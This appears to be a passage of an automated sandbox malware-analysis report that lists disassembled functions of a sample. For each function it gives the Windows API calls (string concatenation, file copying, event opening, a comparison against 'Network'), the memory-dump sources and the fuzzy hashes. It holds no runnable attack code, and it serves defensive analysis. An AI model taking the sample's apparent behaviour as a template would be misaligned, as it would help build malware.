                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                                                                                          • String ID: " $^\w$^\w
                                                                                                                                                                                                                          • API String ID: 3660427363-1957396040
                                                                                                                                                                                                                          • Opcode ID: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                                                                          • Instruction ID: 0d34f9e0d8b49bd60d604e6c48f6b3b48a5b9a3a064a98a57d4dcc57e91ac9fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF01879641110BFD214DF44DC89EA5B7BCEF55710F144869F948D7320EA64BC118A66
                                                                                                                                                                                                                          Function 0041C89F Relevance: 6.2, APIs: 4, Instructions: 154stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0067CC40), ref: 0041C8FB
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0067CC4F), ref: 0041C9C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4038537762-0
                                                                                                                                                                                                                          • Opcode ID: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                                                                          • Instruction ID: 91129cc135b6de1bd884046890de669bd94a0d0b4a39d456f35227959ca6c7b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC5183B6A00115AFCB04DF98DD81AD9B3B4FF58310B084479E906D3361FBB8AA59CF55
                                                                                                                                                                                                                          Function 0041F11C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CopyFile
                                                                                                                                                                                                                          • String ID: 0$ 0
                                                                                                                                                                                                                          • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                          • Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                          • Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
                                                                                                                                                                                                                          Function 0043D191 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EventOpen
                                                                                                                                                                                                                          • String ID: -E~$z0_
                                                                                                                                                                                                                          • API String ID: 3658969616-3497079166
                                                                                                                                                                                                                          • Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                          • Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
                                                                                                                                                                                                                          Function 0041F25E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CopyFile
                                                                                                                                                                                                                          • String ID: 0$ 0
                                                                                                                                                                                                                          • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                          • Opcode ID: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                          • Instruction ID: 46ca0ec3ac5e7fe645135cbb6742112b101b88f065de0e8023397726ea1268d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4018C3AB40100AFD744DF68DD91E4833E69BCA200B1906B9ED05D33A1E5B0AC458B56
                                                                                                                                                                                                                          Function 0041ED46 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$Network
                                                                                                                                                                                                                          • API String ID: 0-350251746
                                                                                                                                                                                                                          • Opcode ID: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                          • Instruction ID: f80f0783777fa5cc836e735bdae024c9e7f2125abd3eb6355b1fadc9e12c604f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4E04F7960020ADFC708DF24DEA4994B3BAFFC6248B094564DD099B235E7B1BC46CB55
                                                                                                                                                                                                                          Function 004260E5 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                          • Opcode ID: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                                                                          • Instruction ID: c250d11b6629f2eea65e49512af102c608c6350f49251a8cd05842a55814024d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49116DB2D101286BE7109AA5DC49E9B7EBCEB85358F04042EF508D7241E6B59A44CBE4